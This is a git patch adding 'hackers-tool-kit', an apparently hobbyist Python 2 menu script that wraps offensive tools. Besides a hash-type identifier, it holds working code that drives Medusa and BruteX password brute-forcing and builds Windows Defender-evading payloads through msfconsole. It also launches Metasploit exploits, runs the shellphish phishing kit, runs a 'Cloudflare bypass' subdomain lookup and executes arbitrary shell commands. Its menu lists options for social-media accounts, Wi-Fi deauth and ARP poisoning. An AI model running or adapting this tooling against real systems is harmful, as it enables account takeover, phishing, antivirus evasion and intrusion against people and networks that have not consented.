len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -def upgrade(): - os.system("apt update && apt upgrade") -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arppois": - appois() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - found = True -mainbanner() -main() From b3df1f8d66f76c77d8a1e5b609cd26135c231a8c Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 24 Mar 2019 14:46:23 -0400 Subject: [PATCH 054/214] Add files via upload --- htk.py | 2054 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2054 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..4975b93 --- /dev/null +++ b/htk.py @@ -0,0 +1,2054 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +def mainbanner(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated 